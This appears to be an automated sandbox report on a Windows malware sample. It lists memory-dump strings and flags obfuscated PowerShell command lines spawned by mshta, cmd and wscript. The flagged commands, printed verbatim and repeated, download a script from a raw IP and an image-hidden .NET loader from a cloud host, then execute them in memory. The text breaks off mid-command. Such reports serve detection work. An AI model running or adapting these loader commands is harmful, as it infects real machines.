eamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulercalendartriggermicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotjojndnlib.dotnet.pdbsymbolreadercreatorjmjldnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerjkjjdnlib.dotnet.mdimagecor20headerjidnlib.dotnet.mdirawrowjhdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dot
Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000007.00000002.2155555461.000000000798A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2152902022.00000000072D0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2154082087.00000000078D5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbX source: powershell.exe, 00000007.00000002.2154082087.0000000007942000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbDi source: powershell.exe, 00000007.00000002.2154082087.00000000078D5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000007.00000002.2154082087.0000000007870000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2154082087.00000000078D5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb9e source: powershell.exe, 00000007.00000002.2154082087.0000000007942000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000007.00000002.2155555461.000000000798A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2152902022.00000000072D0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: em.pdb source: powershell.exe, 00000007.00000002.2154082087.0000000007870000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: powershell.exe, 00000007.00000002.2154082087.0000000007870000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000007.00000002.2155555461.000000000798A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000007.00000002.2154082087.0000000007870000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbifd source: powershell.exe, 00000007.00000002.2120286535.000000000319B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: indows\dll\System.pdb source: powershell.exe, 00000007.00000002.2154082087.0000000007942000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000007.00000002.2154082087.00000000078D5000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

PowerShell case anomaly found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))"	Jump to behavior

Suspicious command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/C PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/C PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$antisiphonal = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$orlage = New-Object System.Net.WebClient;$centralised = $orlage.DownloadData($antisiphonal);$slanshacks = [System.Text.Encoding]::UTF8.GetString($centralised);$commends = '<<BASE64_START>>';$Lemaitre = '<<BASE64_END>>';$ependymis = $slanshacks.IndexOf($commends);$transcolation = $slanshacks.IndexOf($Lemaitre);$ependymis -ge 0 -and $transcolation -gt $ependymis;$ependymis += $commends.Length;$scribblage = $transcolation - $ependymis;$dorsolumbar = $slanshacks.Substring($ependymis, $scribblage);$keltologist = -join ($dorsolumbar.ToCharArray() \| ForEach-Object { $_ })[-1..-($dorsolumbar.Length)];$carinately = [System.Convert]::FromBase64String($keltologist);$brite = [System.Reflection.Assembly]::Load($carinately);$helygia = [dnlib.IO.Home].GetMethod('VAI');$helygia.Invoke($null, @('0/qvVum/r/ee.etsap//:sptth', 'creance', 'creance', 'creance', 'CasPol', 'creance', 'creance','creance','creance','creance','creance','creance','1','creance','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9